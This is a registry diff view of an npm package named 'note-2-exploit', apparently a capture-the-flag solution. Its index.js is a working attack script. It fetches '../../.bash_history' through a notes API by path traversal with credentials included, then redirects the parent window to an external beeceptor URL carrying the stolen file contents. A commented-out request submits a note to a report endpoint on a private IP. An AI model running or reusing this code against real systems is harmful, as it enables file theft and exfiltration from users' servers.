note-2-exploit 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +32 -0
- package/package.json +11 -0
package/index.js
ADDED
@@ -0,0 +1,32 @@
|
|
1
|
+
async function exploit() {
|
2
|
+
let file_content = await fetch("/api/notes?id=" + "../../.bash_history", {
|
3
|
+
"headers": {
|
4
|
+
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
|
5
|
+
"accept-language": "zh-TW,zh;q=0.9",
|
6
|
+
"sec-gpc": "1",
|
7
|
+
"upgrade-insecure-requests": "1"
|
8
|
+
},
|
9
|
+
"body": null,
|
10
|
+
"method": "GET",
|
11
|
+
"mode": "cors",
|
12
|
+
"credentials": "include"
|
13
|
+
}).then(res => res.json())
|
14
|
+
.then(res => res.content);
|
15
|
+
window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + file_content);
|
16
|
+
// fetch("http://10.113.184.121:10082/report", {
|
17
|
+
// "headers": {
|
18
|
+
// "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
|
19
|
+
// "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
20
|
+
// "cache-control": "max-age=0",
|
21
|
+
// "content-type": "application/x-www-form-urlencoded",
|
22
|
+
// "sec-gpc": "1",
|
23
|
+
// "upgrade-insecure-requests": "1"
|
24
|
+
// },
|
25
|
+
// "referrer": "http://10.113.184.121:10082/note?id=d2fb5034-dfa3-4fbe-be8e-7f75ff8d53a7",
|
26
|
+
// "referrerPolicy": "strict-origin-when-cross-origin",
|
27
|
+
// "body": "note_id=d2fb5034-dfa3-4fbe-be8e-7f75ff8d53a7&author=nnnddd",
|
28
|
+
// "method": "POST",
|
29
|
+
// "mode": "cors",
|
30
|
+
// "credentials": "include"
|
31
|
+
// });
|
32
|
+
};
|